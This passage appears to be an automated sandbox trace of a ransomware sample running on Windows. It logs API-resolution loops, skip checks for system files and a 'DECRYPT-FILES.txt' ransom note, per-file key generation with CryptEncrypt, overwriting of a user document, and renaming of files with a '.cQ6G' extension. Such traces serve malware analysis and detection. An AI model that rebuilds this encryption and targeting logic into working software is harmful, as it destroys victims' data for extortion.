(lpString="CREATETAPEPARTITION") returned 19 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.871] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.871] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.871] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.871] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.871] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.871] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.871] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.871] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.871] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.871] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.871] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.871] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.871] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.871] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.871] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.872] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.872] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.872] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.872] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.872] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.872] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.872] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.872] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.872] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.872] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.872] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.872] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.872] lstrlenA (lpString="DELETEATOM") returned 10 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.872] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.872] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.872] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.872] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.872] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.872] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.873] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.873] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.873] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.873] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.873] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.873] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.873] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.873] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.873] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.873] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.873] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.873] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.873] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.873] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.873] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.873] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.873] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.873] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.873] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.874] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.874] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.874] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.874] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.874] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.874] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.874] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.874] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.874] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.874] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.874] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.874] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.874] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.874] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.874] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.874] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.874] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.874] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.875] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.875] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls") returned 78 [0083.875] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls.cQ6G") returned 83 [0083.875] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\gtxcw8yofxewslrp.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\gtXCw8YOfxeWSlrp.xls.cQ6G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\gtxcw8yofxewslrp.xls.cq6g"), dwFlags=0x0) returned 1 [0083.875] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.875] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.876] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.876] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe9fd0, ftCreationTime.dwHighDateTime=0x1d4d57c, ftLastAccessTime.dwLowDateTime=0x81423600, ftLastAccessTime.dwHighDateTime=0x1d4c925, ftLastWriteTime.dwLowDateTime=0x81423600, ftLastWriteTime.dwHighDateTime=0x1d4c925, nFileSizeHigh=0x0, nFileSizeLow=0x49f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="i2GfW.pptx", cAlternateFileName="I2GFW~1.PPT")) returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="autorun.inf") returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="boot.ini") returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="desktop.ini") returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="ntuser.dat") returned -1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="iconcache.db") returned -1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="bootsect.bak") returned 1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="ntuser.dat.log") returned -1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="thumbs.db") returned -1 [0083.876] lstrcmpiW (lpString1="i2GfW.pptx", lpString2="Bootfont.bin") returned 1 [0083.876] lstrlenW (lpString="i2GfW.pptx") returned 10 [0083.876] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0083.876] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0083.876] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0083.876] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0083.876] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.876] lstrlenW (lpString="i2GfW.pptx") returned 10 [0083.876] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.876] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="i2GfW.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx" [0083.877] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\i2gfw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.877] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=18929) returned 1 [0083.877] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.877] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.877] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.877] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.877] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.878] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.878] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.878] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.878] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.879] CloseHandle (hObject=0x42c) returned 1 [0083.879] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.879] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.880] CloseHandle (hObject=0x0) returned 0 [0083.880] CloseHandle (hObject=0x428) returned 1 [0083.880] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.880] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.880] GetTickCount () returned 0x114d6fe [0083.880] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.881] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.881] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.881] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.881] lstrlenA (lpString="kernel32.dll") returned 12 [0083.881] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.881] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.881] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.881] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.881] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.881] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.881] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.881] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.881] lstrlenA (lpString="ADDATOMA") returned 8 [0083.881] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.882] lstrlenA (lpString="ADDATOMW") returned 8 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.882] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.882] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.882] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.882] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.882] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.882] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.882] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.882] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.882] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.882] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.882] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.882] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.882] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.882] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.882] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.882] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: 